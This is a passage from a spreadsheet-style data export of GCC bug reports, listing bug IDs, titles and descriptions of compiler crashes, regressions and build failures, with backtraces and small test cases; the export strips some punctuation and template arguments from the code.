The configure check should use -std=gnu++98 or -std=gnu++11 (so we correctly detect the presence of ::gets when it's needed) and the declaration should only be done for C++98 and C++11 (so we only add it when it's needed).</t>
  </si>
  <si>
    <t>GCC-59111</t>
  </si>
  <si>
    <t>[4.9 Regression] [c++11] ICE on invalid usage of auto in return type</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers an ICE on trunk:
=====================
auto
int i = foo()
=====================
bug.cc:1:11: warning: 'foo' function uses 'auto' type specifier without trailing return type [enabled by default]
 auto
           ^
bug.cc:3:13: internal compiler error: tree check: expected record_type or union_type or qual_union_type have template_type_parm in lookup_conversions at cp/search.c:2509
 int i = foo()
             ^
0xd3a614 tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9166
0x6bd9f7 tree_check3
        ../../gcc/gcc/tree.h:2746
0x6bd9f7 lookup_conversions(tree_node*)
        ../../gcc/gcc/cp/search.c:2509
0x5493a6 build_user_type_conversion_1
        ../../gcc/gcc/cp/call.c:3447
0x54a3c1 implicit_conversion
        ../../gcc/gcc/cp/call.c:1756
0x54ff6c can_convert_arg_bad(tree_node* tree_node* tree_node* int int)
        ../../gcc/gcc/cp/call.c:8960
0x677940 convert_for_assignment
        ../../gcc/gcc/cp/typeck.c:7992
0x5eff71 digest_init_r
        ../../gcc/gcc/cp/typeck2.c:1009
0x5f1dc2 digest_init_flags
        ../../gcc/gcc/cp/typeck2.c:1078
0x5f1dc2 store_init_value(tree_node* tree_node* vec** int)
        ../../gcc/gcc/cp/typeck2.c:766
0x566066 check_initializer
        ../../gcc/gcc/cp/decl.c:5739
0x57909d cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6358
0x666c11 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16727
0x66837f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11118
0x64c7b0 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10999
0x670477 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10896
0x66f198 cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10782
0x670a3a cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4010
0x670a3a c_parse_file()
        ../../gcc/gcc/cp/parser.c:31187
0x791cd3 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1055
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-25593</t>
  </si>
  <si>
    <t>Socket problems</t>
  </si>
  <si>
    <t>When using jcraft's jsch ssh2 port forwarding in a gcj compiled application connections terminate unexpectedly.  It works fine in Sun's java.
I've tried to make a test case with HServer/HClient.  The server listens to a port and then the client connects to it.  The OutputStream is closed while the InputStream is still reading in another thread.
---
On Sun's Java (win32 or linux):
HServer:
java.net.SocketException: Socket closed
        at java.net.SocketInputStream.read(SocketInputStream.java:162)
        at HServer$1.run(HServer.java:29)
HClient:
READ: 12
---
Win32 GCJ 4.0.2  (thisiscool.com)
Hserver:
java.io.IOException: An established connection was aborted by the software in your host machine.
   at .__ZN9HServer$13runEv (E:\dev\TURL\HServer.java)
HClient:
java.io.IOException: An existing connection was forcibly closed by the remote host.
   at .__ZN7HClient4mainEP6JArrayIPN4java4lang6StringEE (E:\dev\TURL\HClient.java)
   at ._main (C:\WINDOWS\TEMP\cc88aaaa.i)
----
GCJ Linux: 
Hserver:
java.io.IOException: Bad file descriptor
   at HServer$1.run (HServer)
HClient:
READ: 12
-------</t>
  </si>
  <si>
    <t>GCC-81835</t>
  </si>
  <si>
    <t>cxxabi.h has invalid link in comment.</t>
  </si>
  <si>
    <t>Tiny issue.
Looking over cxxabi.h I noticed a link in a comment about __cxa_demangle is not valid anymore:
   *  See http://gcc.gnu.org/onlinedocs/libstdc++/manual/bk01pt12ch39.html
   *  for other examples of use.
I am looking for the implementation of the demangler code we have on our mebedded targets in RTEMS. A pointer to that location would be most welcomed.
Thanks
Chris</t>
  </si>
  <si>
    <t>GCC-33198</t>
  </si>
  <si>
    <t>Derived type in common: Default initializer not rejected</t>
  </si>
  <si>
    <t>Split off from PR 32985.
gfortran does not reject derived types with default initializers in common.
C589 (R558) If a common-block-object is of a derived type it shall be a
sequence type (4.5.1) or a type with the BIND attribute and it shall have no
default initialization.
The check should be added to resolve.c's resolve_common_blocks.
Example:
  type a
    sequence
    integer :: i = 1
  end type a
  type(a) :: t
  common /c/ t
  end</t>
  </si>
  <si>
    <t>GCC-41510</t>
  </si>
  <si>
    <t>[C++0x] std::complex vs. initialization lists</t>
  </si>
  <si>
    <t>Here is a sketch of what C++0x std::complex might look like. Minus of course constexpr. Also included in the patch is a testfile that does the usual init_list tests on std::complex overloads.
It fails to compile with ambiguous overloads. As so:
%$bld/H-x86-gcc.20090927/bin/g++ -std=gnu++0x -g -O2 testsuite/26_numerics/complex/complex_init.cc 
testsuite/26_numerics/complex/complex_init.cc: In function â€˜void check_copy_list_initialization() [with _Tp = float]â€™:
testsuite/26_numerics/complex/complex_init.cc:33:41:   instantiated from here
testsuite/26_numerics/complex/complex_init.cc:18:42: error: call of overloaded â€˜complex()â€™ is ambiguous
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1458:3: note: candidates are: std::complex::complex(const std::complex&amp;)
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1454:3: note:                 std::complex::complex(const std::complex&amp;)
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1020:5: note:                 std::complex::complex(const std::complex&amp;)
testsuite/26_numerics/complex/complex_init.cc: In function â€˜void check_copy_list_initialization() [with _Tp = double]â€™:
testsuite/26_numerics/complex/complex_init.cc:34:42:   instantiated from here
testsuite/26_numerics/complex/complex_init.cc:18:42: error: call of overloaded â€˜complex()â€™ is ambiguous
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1462:3: note: candidates are: std::complex::complex(const std::complex&amp;)
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1176:7: note:                 std::complex::complex(const std::complex&amp;)
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1164:5: note:                 std::complex::complex(const std::complex&amp;)
testsuite/26_numerics/complex/complex_init.cc: In function â€˜void check_copy_list_initialization() [with _Tp = long double]â€™:
testsuite/26_numerics/complex/complex_init.cc:35:47:   instantiated from here
testsuite/26_numerics/complex/complex_init.cc:18:42: error: call of overloaded â€˜complex()â€™ is ambiguous
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1324:7: note: candidates are: std::complex::complex(const std::complex&amp;)
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1321:7: note:                 std::complex::complex(const std::complex&amp;)
/mnt/disk/dolores/mnt/share/bld/H-x86-gcc.20090927/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/complex:1309:5: note:                 std::complex::complex(const std::complex&amp;)
It's hard to tell w/o the constexpr overloads in. Thoughts?
-benjamin</t>
  </si>
  <si>
    <t>GCC-53120</t>
  </si>
  <si>
    <t>[4.5 4.6 4.7 4.8 Regression]: ICE exposing strict_low_part / in/out operand thinko -fno-tree-sra</t>
  </si>
  <si>
    <t>Created attachment 27240
./cc1 -O2 -fno-tree-sra
The attached test-case intended for gcc.dg/torture exposes a thinko in the CRIS port: a read/write output operand (the + constraint modifier) is specified to match an input operand (0).  Reload cannot cope and thinking about it it's not possible (with the current hooks and macros).  According to a comment in m68k.md this is to be expected supported by a gdb session.  The m68k comment (grep MATCH_DUP m68k.md) is from revision 372 (!) which according to the (artificially mapped) svn revision numbers are about 10 revisions from the introduction of reload.c (!!).  Patch in testing. The observation was from an import of the 4.7 branch also confirmed on branches for 4.5 4.6 4.7 and trunk but not for 4.3.  The use of + was introduced with revision r134236 (2008-04-13 02:51:51 UTC) before the 4.4 branch. The bug is of course there but just not trigging for 4.4 but nevertheless observed as a regression of 4.5 therefore labelled as such.  Note the requirement to turn off tree-sra.</t>
  </si>
  <si>
    <t>GCC-38251</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] tools.zip doesn't build on systems with short command lines</t>
  </si>
  <si>
    <t>As of trunk revision 142086 libgcj doesn't build any longer on Tru64 UNIX V5.1B:
(cd classes \
	jar cf ../tools.zip `find . -name .svn -prune -o -type f -print` \
	cd ..)
/usr/local/bin/bash: /vol/gnu/bin/jar: Arg list too long
I think such systems still need to be taken into account.
This was broken by this change:
2008-11-05  Andrew Haley  
	* tools/Makefile.am (UPDATE_TOOLS_ZIP CREATE_TOOLS_ZIP): Exclude
	.svn directories.</t>
  </si>
  <si>
    <t>GCC-15520</t>
  </si>
  <si>
    <t>[4.0 Regression] miscompilation in tree-dom</t>
  </si>
  <si>
    <t>The attached file is part of emacs -- function record_buffer () from file
buffer.c (preprocessed and reformatted). It is miscompiled by gcc (probably at
tree-dom because -fno-tree-dominator-opts makes bug disappear).
You can test it with emacs by removing original function from buffer.c and link
emacs with this. When emacs starts press C-x k to kill *scratch* buffer and if
it is miscompiled you get message like 'No buffer named *scratch*'.</t>
  </si>
  <si>
    <t>GCC-69219</t>
  </si>
  <si>
    <t>[5/6 regression] error on nested subprograms with Inline_Always and Intrinsic</t>
  </si>
  <si>
    <t>Created attachment 37297
minimal bug triggering source code
gcc-5 and later have generated no machine-code for subprograms having the combination of Inline_Always and Intrinsic.
However this pattern causes  error for nested subprograms.
procedure nestedinlinealways is -- outer subprogram
   procedure NI
   pragma No_Inline (NI)
   procedure IA
   pragma Convention (Intrinsic IA)
   pragma Inline_Always (IA)
-- pragma Inline (IA) -- it works fine.
   procedure IA is
   begin
      NI -- calling other subprogram here is one of the triggers.
   end IA
   procedure NI is null
begin
   IA
end nestedinlinealways
Please try to compile above code (the attached file):
% gcc -c nestedinlinealways.adb
: In function 'nestedinlinealways.ia':
nestedinlinealways.adb:3:14: error: subprogram 'nestedinlinealways.ni' not marked Inline_Always
nestedinlinealways.adb:11:4: error: parent subprogram cannot be inlined
It will become to be compiled if I replace pragma Inline_Always to normal Inline or remove pragma Convention.</t>
  </si>
  <si>
    <t>GCC-56486</t>
  </si>
  <si>
    <t>[4.7 Regression] infinite loop in cc1 at -O1</t>
  </si>
  <si>
    <t xml:space="preserve">The following code (generated by csmith) causes gcc 4.6.3 and 4.7.2 to go into an infinite loop when compiled at -O1 or higher.  This does not occur with current trunk or gcc 4.5.4 (although 4.5.4 does take about 10 seconds to compile it) so technically this is a regression on 4.6 and 4.7.
An attempt to use creduce to reduce it failed as end-result no longer hangs (it does take 10 seconds to compile though).
$ gcc-4.7 --version
gcc-4.7 (GCC) 4.7.2
$ gcc-4.5 -O1 crash.i
$ gcc-trunk -O1 crash.i
$ gcc-4.7 -O1 crash.i
</t>
  </si>
  <si>
    <t>GCC-9100</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] illegal binary constant causes gcc to seg fault</t>
  </si>
  <si>
    <t>I used an illegal binary constant declaration (0b111) this caused avr-gcc to crash:
-------- begin --------
avr-gcc --version
avr-gcc (GCC) 3.3 20021209 (experimental)
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Size before:
   text	   data	    bss	    dec	    hex	filename
      0	    390	      0	    390	    186	pin_test.hex
avr-gcc -c -g -Os -funsigned-char -funsigned-bitfields -fpack-struct -save-temps -fshort-enums -Wall -Wstrict-prototypes -Wa-ahlms=pin_test.lst -mmcu=atmega128 -I. pin_test.c -o pin_test.o
pin_test.c:40:61: invalid suffix b11111000 on integer constant
pin_test.c: In function `__vector_16':
pin_test.c:40: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [pin_test.o] Error 1
C:\coding\sources\avr\pin_test&gt;
I will also report this on the avr-gcc forum but it seems to be a generic gcc problem (it should never crash).
Release:
3.3
Environment:
Win32(Win2k) WinAVR release of AVR-gcc.
How-To-Repeat:
Compile the attached file with the options as shown in the description. Observe the error message.</t>
  </si>
  <si>
    <t>sander_pool</t>
  </si>
  <si>
    <t>GCC-71047</t>
  </si>
  <si>
    <t>[7 Regression] Allocatable component of INTENT(OUT) dummy not set correctly</t>
  </si>
  <si>
    <t>When compiled with gfortran the attached code which is correct as
far as I can tell produces an error at runtime:
$ ./test
At line 20 of file test.f90
Fortran runtime error: Attempting to allocate already allocated variable 'y'
$ gfortran --version
GNU Fortran (GCC) 7.0.0 20160510 (experimental)
Notice that the dummy argument y of set has intent(out) so that
its component f can not be allocated regardless of the state of the
actual argument.
I think that the code was working with an older version of the
gfortran trunk (some weeks ago?) - or at least the code I derived
this example from was working correctly.
module m
 implicit none
 type abstract :: c_abstr
  integer :: i = 0
 end type c_abstr
 type extends(c_abstr) :: t_a
  class(c_abstr) allocatable :: f
 end type t_a
 type extends(c_abstr) :: t_b
 end type t_b
contains
 subroutine set(yx)
  class(c_abstr) intent(in)  :: x
  type(t_a)      intent(out) :: y
   allocate( y%f  source=x )
 end subroutine set
end module m
program p
 use m
 implicit none
 type(t_a) :: res
 type(t_b) :: var
  call set( res  var )
  write(**) res%i
end program p</t>
  </si>
  <si>
    <t>GCC-37645</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 regression] ICE with weakref attribute</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE since GCC 4.1.0:
==========================================================
void foo(int i __attribute__((__weakref__ (xyz))))
==========================================================
bug.c:1: internal compiler error: tree check: expected tree that contains 'decl with visibility' structure have 'parm_decl' in handle_weakref_attribute at c-common.c:6162
Please submit a full bug report [etc.]
Before GCC 4.1.0 the code was accepted with the following warning:
bug.c:1: warning: '__weakref__' attribute directive ignored</t>
  </si>
  <si>
    <t>GCC-72866</t>
  </si>
  <si>
    <t>Compile time hog w/ -O3 (-Ofast)</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160807 takes large (or infinite?) time when compiling the following reduced testcase w/ -O3 or -Ofast:
unsigned int dl
int rx lb
void
fo (int jv int be)
{
  const unsigned int xw = 16
  unsigned int ya wo
  for (ya = 0 ya &lt; 2 ++ya)
    for (wo = 0 wo &lt; xw ++wo)
      {
        dl += (jv ? be : rx)
        rx += ((lb == 0) + 1)
      }
}
Compilation time appears to be dependent on the value stored in `xw'.</t>
  </si>
  <si>
    <t>GCC-47174</t>
  </si>
  <si>
    <t>libquadmath: Build now depends on makeinfo</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/ml/fortran/2011-01/msg00012.html
libquadmath now fails to build if makeinfo isn't installed on the system:
[...]
WARNING: `makeinfo' is missing on your system.  You should only need it if
         you modified a `.texi' or `.texinfo' file or any other file
         indirectly affecting the aspect of the manual.  The spurious
         call might also be the consequence of using a buggy `make' (AIX
         DU IRIX).  You might want to install the `Texinfo' package or
         the `GNU make' package.  Grab either from any GNU archive site.
make[3]: *** [libquadmath.info] Error 1
There is apparently a dependency on libquadmath.info via INFO_DEPS:
INFO_DEPS = libquadmath.info
&gt; In what way is that different from say libgomp?
&gt; IIUC makeinfo is required for the development tree.
libgomp doesn't fail to build in this configuration.  In fact all components
used to build in this configuration (except maybe libjava) up to the patch.</t>
  </si>
  <si>
    <t>GCC-45917</t>
  </si>
  <si>
    <t>inaccessible types allowed as template argument in nested-name-specifier</t>
  </si>
  <si>
    <t>testcase below has struct R as private in class F.
class F declares class Q a friend allowing it to see it's private members.
But operator&lt;&lt; is friend in Q not in F.
Why is it allowed for operator but not R r? This is a bug.
--- testcase ---
#include 
#include 
using namespace std
class F {
private:
  struct R {
  } // R
  friend class Q
  class Q {
    list l
    friend ostream&amp; operator&lt;&lt;(ostream &amp;os const Q &amp;q) {
      // R r // this breaks!
      for (list::const_iterator it = q.l.begin() it != q.l.end() it++) { // this doesn't break! Why?
      }
      return os
    }
  } // Q
} // F</t>
  </si>
  <si>
    <t>GCC-24620</t>
  </si>
  <si>
    <t>[4.1 Regression] internal compiler error: in find_reloads at reload.c:3730</t>
  </si>
  <si>
    <t>/usr/lib64/gcc/s390x-suse-linux/4.1.0/cc1plus -fpreprocessed alpha_mask3.ii -quiet -dumpbase alpha_mask3.cpp -m64 -mzarch -march=z900 -auxbase-strip alpha_mask3.o -O2 -Wall -version -fmessage-length=0 -o alpha_mask3.s
alpha_mask3.cpp: In member function 'unsigned int the_application::render()':              alpha_mask3.cpp:489: error: unable to generate reloads for:                                (insn 3221 3217 3224 335 (set (zero_extract:DI (subreg:DI (reg:SI 12 %r12 [orig:672 D.16347 ] [672]) 0)                                                                                           (const_int 16 [0x10])                                                                      (const_int 48 [0x30]))                                                                 (const_int 32794 [0x801a])) 101 {*insvdi_reg_imm} (insn_list:REG_DEP_TRUE 3217 (nil))                                                                                             (nil))                                                                                 alpha_mask3.cpp:489: internal compiler error: in find_reloads at reload.c:3730</t>
  </si>
  <si>
    <t>GCC-66061</t>
  </si>
  <si>
    <t>[5/6 Regression] Internal Compiler Error when specializing a variable template when the specialization is variadic</t>
  </si>
  <si>
    <t>main.cpp:
template
int x = 1
template
int x = 1
david@i5-fedora ~/test&gt; g++ source/main.cpp -c -std=c++14
source/main.cpp:5:5: internal compiler error: in process_partial_specialization at cp/pt.c:4248
 int x = 1
     ^
0x63102e process_partial_specialization
	../../gcc/gcc/cp/pt.c:4248
0x631517 push_template_decl_real(tree_node* bool)
	../../gcc/gcc/cp/pt.c:4892
0x60820f start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
	../../gcc/gcc/cp/decl.c:4832
0x67e266 cp_parser_init_declarator
	../../gcc/gcc/cp/parser.c:17170
0x67ee14 cp_parser_single_declaration
	../../gcc/gcc/cp/parser.c:23811
0x67f0b8 cp_parser_template_declaration_after_export
	../../gcc/gcc/cp/parser.c:23602
0x661f79 cp_parser_declaration
	../../gcc/gcc/cp/parser.c:11342
0x688a3a cp_parser_declaration_seq_opt
	../../gcc/gcc/cp/parser.c:11264
0x688d4f cp_parser_translation_unit
	../../gcc/gcc/cp/parser.c:4100
0x688d4f c_parse_file()
	../../gcc/gcc/cp/parser.c:33192
0x73b692 c_common_parse_file()
	../../gcc/gcc/c-family/c-opts.c:1057
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-49589</t>
  </si>
  <si>
    <t>[C++0x] Internal compile error at decltype</t>
  </si>
  <si>
    <t>Created attachment 24643
ICE with decltype
The attached code causes the compiler to exit with a segmentation fault at a use of decltype.
g++ --std=gnu++0x decltype_error_2.ii
decltype_error_2.cpp:45:31: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
output of gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/jarrydb/current/soft/install-latest/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/jarrydb/current/soft/src/gcc-svn/configure --prefix=/home/jarrydb/current/soft/install-latest --disable-multilib --enable-languages=cc++go
Thread model: posix
gcc version 4.7.0 20110630 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-42369</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 155217 failed to bootstrap</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 155225 gave:
../../src-trunk/gcc/config/i386/i386.c:23844: error: duplicate case value
../../src-trunk/gcc/config/i386/i386.c:23842: error: previously used here</t>
  </si>
  <si>
    <t>GCC-46873</t>
  </si>
  <si>
    <t>[C++0x] ICE: in build_data_member_initialization at cp/semantics.c:5489</t>
  </si>
  <si>
    <t>---------- testcase.C ----------
struct S
{
  int i:1
}
struct T
{
  const S s
  constexpr T (S a = S ()) : s (a) { }
}
T t
--------------------------------
I don't know if the code is valid but the original code was (unless there is invalid code in system headers).
Compiler output:
$ gcc -std=c++0x testcase.C 
gcc -std=c++0x testcase.C 
testcase.C: In constructor 'constexpr T::T(S)':
testcase.C:9:38: internal compiler error: in build_data_member_initialization at cp/semantics.c:5489
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r167621 - crash</t>
  </si>
  <si>
    <t>GCC-69411</t>
  </si>
  <si>
    <t>Created attachment 37416
reduced test case
Hi
the attached small.cc creates an ICE when compiled with -fsanitize=undefined
initially the ICE was triggered by a single error in &gt; 100.000 lines C++ code.
gcc -c -fsanitize=undefined small.cc
small.cc:2:3: error: expected '{' before 'inline'
   inline namespace __cxx11 __attribute__((__abi_tag__ (cxx11))) { }
   ^~~~~~
[...]
small.cc:151:1: error: expected '}' at end of input
small.cc:126:12: warning: inline function 'T* std::TB5Util::SOCmnPointer::p() const [with T = std::TB5Util::OTClientSession]' used but never defined
  inline T* p() const
            ^
small.cc:134:24: warning: inline function 'const tstring&amp; std::TB5Util::OTClientSession::getUrl() const' used but never defined
  inline const tstring
                        ^~~~~~
small.cc: In member function 'std::TB5Util::EnumStatusCode std::TB5Util::SecureChannel::removeSession(std::TB5Util::OTClientSessionPtr bool)':
small.cc:150:121: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in create_tmp_from_val at gimplify.c:497
   messageStream getName() getUrl()
                                                                                                                         ^~~~
0xf86f27 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
	../../gcc-6-20160110/gcc/tree.c:9654
0xace87f tree_class_check(tree_node* tree_code_class char const* int char const*)
	../../gcc-6-20160110/gcc/tree.h:3121
0xace87f create_tmp_from_val
	../../gcc-6-20160110/gcc/gimplify.c:497
0xace87f lookup_tmp_var
	../../gcc-6-20160110/gcc/gimplify.c:533
0xace87f internal_get_tmp_var
	../../gcc-6-20160110/gcc/gimplify.c:563
0xac6652 get_initialized_tmp_var(tree_node* gimple** gimple**)
	../../gcc-6-20160110/gcc/gimplify.c:600
0xac6652 gimplify_save_expr
	../../gcc-6-20160110/gcc/gimplify.c:4977
0xac6652 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../gcc-6-20160110/gcc/gimplify.c:10402
0xad737a gimplify_call_expr
	../../gcc-6-20160110/gcc/gimplify.c:2361
0xac6ac1 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../gcc-6-20160110/gcc/gimplify.c:10085
0xacb756 gimplify_stmt(tree_node** gimple**)
	../../gcc-6-20160110/gcc/gimplify.c:5616
0xacc361 gimplify_compound_expr
	../../gcc-6-20160110/gcc/gimplify.c:4932
0xac724c gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../gcc-6-20160110/gcc/gimplify.c:10103
0xad6c9b gimplify_call_expr
	../../gcc-6-20160110/gcc/gimplify.c:2528
0xac6ac1 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../gcc-6-20160110/gcc/gimplify.c:10085
0xace24c internal_get_tmp_var
	../../gcc-6-20160110/gcc/gimplify.c:557
0xac6652 get_initialized_tmp_var(tree_node* gimple** gimple**)
	../../gcc-6-20160110/gcc/gimplify.c:600
0xac6652 gimplify_save_expr
	../../gcc-6-20160110/gcc/gimplify.c:4977
0xac6652 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../gcc-6-20160110/gcc/gimplify.c:10402
0xad737a gimplify_call_expr
	../../gcc-6-20160110/gcc/gimplify.c:2361
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-14245</t>
  </si>
  <si>
    <t>[3.4 only] problem with user-defined allocators in std::basic_string</t>
  </si>
  <si>
    <t>GCC/libstdc++ 3.3.3-0pre3
Debian Linux Testing(Sarge)
It looks like the STL implementation of libstdc++ 3.3.3.0pre3 assumes that the 
user-defined allocators (at least for basic_string) should be initialized using
the default constructor. 
In particular the copy constructor for the string representation (struct _Rep)
for basic_string uses the default constructor of the
allocator(basic_string.tcc:192). I think this is wrong: the allocator may need
additional info for proper initialization. It is also unnecessary. Simply using
the copy constructor should be enough.
I think the new line should look something like:
   : _M_dataplus(__str._M_rep()-&gt;_M_grab(_Alloc(__str.get_allocator())
__str.get_allocator())
Cheers
Chavdar</t>
  </si>
  <si>
    <t>cbotev</t>
  </si>
  <si>
    <t>GCC-15597</t>
  </si>
  <si>
    <t>Too many arguments to RANDOM_SEED are accepted.</t>
  </si>
  <si>
    <t xml:space="preserve">
Gfortran compiles the following code:
   program s
   integer allocatable :: a(:)
   integer n
   call random_seed(size=n)
   allocate(a(n))
   !
   ! This is illegal.
   ! 13.7.91   RANDOM SEED([SIZE PUT GET])
   ! Description.  Restarts or queries the pseudorandom number generator
   ! used by RANDOM_NUMBER.
   !   Class.     Subroutine.
   !   Arguments. There shall either be exactly one or no arguments present.
   !
   call random_seed(size=n get=a)
   end program s
Environment:
System: FreeBSD c-67-168-59-70.client.comcast.net 5.2-CURRENT FreeBSD 5.2-CURRENT #2: Sat Apr 24 10:33:08 PDT 2004 kargl@c-67-168-59-70.client.comcast.net:/usr/obj/usr/src/sys/HOTRATS i386
host: i386-unknown-freebsd5.2
build: i386-unknown-freebsd5.2
target: i386-unknown-freebsd5.2
configured with: ../gcc/configure --prefix=/home/kargl/gcc/work --enable-languages=cf95
How-To-Repeat:
   See above.</t>
  </si>
  <si>
    <t>GCC-58582</t>
  </si>
  <si>
    <t>[c++11] ICE defining and instantiating deleted template function</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++0x) triggers an ICE since GCC 4.4.0 (when deleted functions were introduced):
========================================
struct A
{
  template void foo() = delete
}
template void A::foo() { int i }
template void A::foo()
========================================
bug.cc:6:20: error: redefinition of 'void A::foo()'
 template void A::foo() { int i }
                    ^
bug.cc:3:22: note: 'void A::foo()' previously declared here
   template void foo() = delete
                      ^
bug.cc: In instantiation of 'void A::foo() [with int  = 0]':
bug.cc:8:25:   required from here
bug.cc:6:36: internal compiler error: in add_stmt at cp/semantics.c:386
 template void A::foo() { int i }
                                    ^
0x6ae530 add_stmt(tree_node*)
        ../../gcc/gcc/cp/semantics.c:386
0x5a43ac tsubst_expr
        ../../gcc/gcc/cp/pt.c:13289
0x5a1cdf instantiate_decl(tree_node* int bool)
        ../../gcc/gcc/cp/pt.c:19391
0x5de5ff instantiate_pending_templates(int)
        ../../gcc/gcc/cp/pt.c:19492
0x619766 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4060
Please submit a full bug report [etc.]
A slightly modified example (just leave out int i) crashes in a different place:
========================================
struct A
{
  template void foo() = delete
}
template void A::foo() {}
template void A::foo()
========================================
bug.cc:6:20: error: redefinition of 'void A::foo()'
 template void A::foo() {}
                    ^
bug.cc:3:22: note: 'void A::foo()' previously declared here
   template void foo() = delete
                      ^
bug.cc: In instantiation of 'void A::foo() [with int  = 0]':
bug.cc:8:25:   required from here
bug.cc:6:30: internal compiler error: in finish_function at cp/decl.c:13810
 template void A::foo() {}
                              ^
0x56ab15 finish_function(int)
        ../../gcc/gcc/cp/decl.c:13810
0x5a1d18 instantiate_decl(tree_node* int bool)
        ../../gcc/gcc/cp/pt.c:19402
0x5de5ff instantiate_pending_templates(int)
        ../../gcc/gcc/cp/pt.c:19492
0x619766 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4060
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-6234</t>
  </si>
  <si>
    <t>HPPA NaN compares wrong</t>
  </si>
  <si>
    <t>In some cases comparing a not-a-number against an ordinary floating point value comes out true.
Release:
2.95.2
Environment:
HP-UX muneca B.11.00 A 9000/780
How-To-Repeat:
If the right code is generated then the it should print out GOOD
bash-2.04$ gcc -v -save-temps -Wall -O2 -fno-strict-aliasing gcc_nan_bug.c -lm -o gcc_nan_bug.exe &amp;&amp; ./gcc_nan_bug.exe &amp;&amp; echo OK
Reading specs from /src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2/specs
gcc version 2.95.2 19991024 (release)
GNU CPP version 2.95.2 19991024 (release) (hppa)
#include ... search starts here:
#include  search starts here:
 /src/sicstus/install/hppa-hpux-B.11.00/include
 /src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2/../../../../hppa2.0n-hp-hpux11.00/include
 /src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2/../../../../include/g++-3
End of omitted list.
 /src/sicstus/install/hppa-hpux-B.11.00/lib/gcc-lib/hppa2.0n-hp-hpux11.00/2.95.2/cc1 gcc_nan_bug.i -quiet -dumpbase gcc_nan_bug.c -O2 -Wall -version -fno-strict-aliasing -o gcc_nan_bug.s
